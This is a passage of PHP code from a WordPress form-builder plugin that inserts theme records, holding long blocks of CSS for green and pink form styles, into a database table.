0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #026994;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #006A91;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #01B4F6;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018ABE;\r\n	background: -moz-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0079A6), color-stop(39%, #018ABE ), color-stop(100%, #00B6FA ));\r\n	background: -webkit-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -o-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -ms-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: linear-gradient(to right, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #C4D5DF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(18, \'Theme 05 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #007326;\r\nborder: 1px solid #B6E4CF;\r\nmargin-bottom: 10px;\r\ncolor: #B6E4CF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/02/nextbg_hover.png) url([SITE_ROOT]/images/05/02/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/02/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #B6E4CF;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 0px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break{\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #018D08;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00AC0A;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018F08 ;\r\n	background: -moz-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #018D08 ), color-stop(39%, #018F08 ), color-stop(100%, #00BE0A ));\r\n	background: -webkit-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -o-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -ms-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\nbackground: linear-gradient(to right, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #CEE0D3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(19, \'Theme 05 pink\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B05785;\r\nborder: 1px solid #F6E2ED;\r\nmargin-bottom: 10px;\r\ncolor: #F6E2ED;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/03/nextbg_hover.png) url([SITE_ROOT]/images/05/03/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B05785 !important;\r\n	color: 